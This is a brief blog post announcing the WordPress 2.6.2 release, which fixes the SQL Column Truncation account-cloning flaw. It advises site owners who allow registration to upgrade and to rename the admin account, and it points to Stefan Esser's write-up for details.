New WordPress version, 2.6.2, was released yesterday to mitigate a new attack called SQL Column Truncation. If you allow users to register, then you need to upgrade to 2.6.2.

You might have heard of SQL injection, which is widely used by hackers. SQL Column Truncation is not widely used however. A malicious user can create a new account using a known user id: admin and gain access to your site through resetting the password.

To learn more about SQL Column truncation, read Stefan Esser’s post “SQL Column Truncation“. He gives a detailed example of how a user id could be cloned, if you allow others to register to your site.

Therefore it is a good idea in general to change the admin id and rename it to an unknown userid, that has the same privileges as admin.

Regards.